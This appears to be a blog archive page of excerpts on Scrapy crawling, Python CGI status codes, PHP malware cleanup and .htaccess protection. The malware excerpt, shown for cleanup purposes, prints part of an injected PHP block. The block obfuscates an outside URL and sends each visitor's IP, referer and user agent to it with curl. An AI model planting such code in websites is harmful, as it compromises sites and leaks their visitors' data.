Build a website crawler using Scrapy Framework

A while ago I discovered the website crawling framework Scrapy, as mentioned in my earlier post “Nice Python website crawler framework”. Now I have written a small website crawler using this ingenious framework. Here are the steps I took to get my blog https://www.ask-sheldon.com crawled: Installation of Scrapy Install Python package management system (pip): $> sudo apt-get install […]

Nice Python website crawler framework

Today I stumbled upon http://scrapy.org/ while searching for an open-source website crawler. It’s an interesting crawling and scraping framework for Python that looks very convenient and easy to use. The most interesting feature seems to be the ability to select website elements (e.g. hyperlinks) via CSS selectors. In any case, I’ll give it a try.

Deliver status 503 with your Python CGI script

I searched a lot for a solution to this simple-looking problem and found plenty of irritating and confusing information about it on the web, ranging from implementing a socket application to setting up a self-made HTTP server. But the answer is much simpler:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
# enable debugging
import sys
import cgitb
import […]
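The excerpt above is cut off before the actual solution. As a minimal sketch (not necessarily the script from the post), assuming the web server runs the script through CGI and honors the CGI `Status` header, a 503 can be delivered by printing that header ahead of the body. The function name `build_503_response` and the `retry_after` parameter are illustrative assumptions, not taken from the post.

```python
#!/usr/bin/env python3
import sys


def build_503_response(message="Service temporarily unavailable", retry_after=3600):
    """Return a complete CGI response (headers plus body) signalling HTTP 503.

    Hypothetical helper: name and parameters are assumptions for illustration.
    """
    headers = [
        # CGI "Status" header; the web server turns it into the HTTP status line.
        "Status: 503 Service Unavailable",
        "Content-Type: text/html; charset=utf-8",
        # Optional hint (in seconds) telling clients when to come back.
        "Retry-After: %d" % retry_after,
    ]
    body = "<html><body><h1>503</h1><p>%s</p></body></html>" % message
    # An empty line separates the headers from the body.
    return "\n".join(headers) + "\n\n" + body


if __name__ == "__main__":
    sys.stdout.write(build_503_response())
```

Keeping the response in a function that returns a string makes it easy to check the headers without a web server; the script itself only writes that string to standard output.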

Find and replace malware code blocks in PHP files via shell

Today one of my servers was attacked by an unknown bot or something similar. Because the FTP password had been cracked, it was able to place the following code in many hundreds of index.php files:

<?php
#19f955#
error_reporting(0);
ini_set('display_errors',0);
$wp_sjqe08340 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_sjqe08340) && !preg_match ('/bot/i', $wp_sjqe08340))){
$wp_sjqe0908340="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_sjqe08340);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_sjqe0908340);
[…]
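The injected block opens with the marker `#19f955#`, but the excerpt ends before the block does, so its closing marker is not visible here. The sketch below assumes, purely hypothetically, that the block ends with `#/19f955#` followed by `?>`, and shows how such a block could be stripped with a regular expression. The post itself works from the shell; this Python version, including the names `strip_injected_block` and `clean_tree`, is only an illustration under that assumption and should be tried on a backup first.

```python
import re
from pathlib import Path

# ASSUMPTION: the block has the shape "<?php #19f955# ... #/19f955# ?>".
# Only the opening marker appears in the excerpt; the closing marker is a guess.
BLOCK_RE = re.compile(rb"<\?php\s*#19f955#.*?#/19f955#\s*\?>\s*", re.DOTALL)


def strip_injected_block(source):
    """Return the given file content (bytes) with every marked block removed."""
    return BLOCK_RE.sub(b"", source)


def clean_tree(root):
    """Rewrite each index.php below root that contains the block.

    Returns the list of files that were changed.
    """
    changed = []
    for path in Path(root).rglob("index.php"):
        original = path.read_bytes()  # bytes keep encoding and line endings intact
        cleaned = strip_injected_block(original)
        if cleaned != original:
            path.write_bytes(cleaned)
            changed.append(path)
    return changed
```

Working on bytes instead of text avoids guessing each file's encoding and leaves everything outside the matched block untouched.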

Protect directory with username and password

To protect a folder with a password prompt, you only need to place a .htaccess and a .htpasswd file in the target directory.

.htaccess:
AuthUserFile /root/path/to/.htpasswd
AuthGroupFile /dev/null
AuthName "Title for the popup window"
AuthType Basic
<Limit GET>
require valid-user
</Limit>

.htpasswd:
username:NiceCryptOrMD5encryptedPasswordHash

The password can be hashed via crypt or MD5. On http://de.selfhtml.org/servercgi/server/htaccess.htm#verzeichnisschutz you can find […]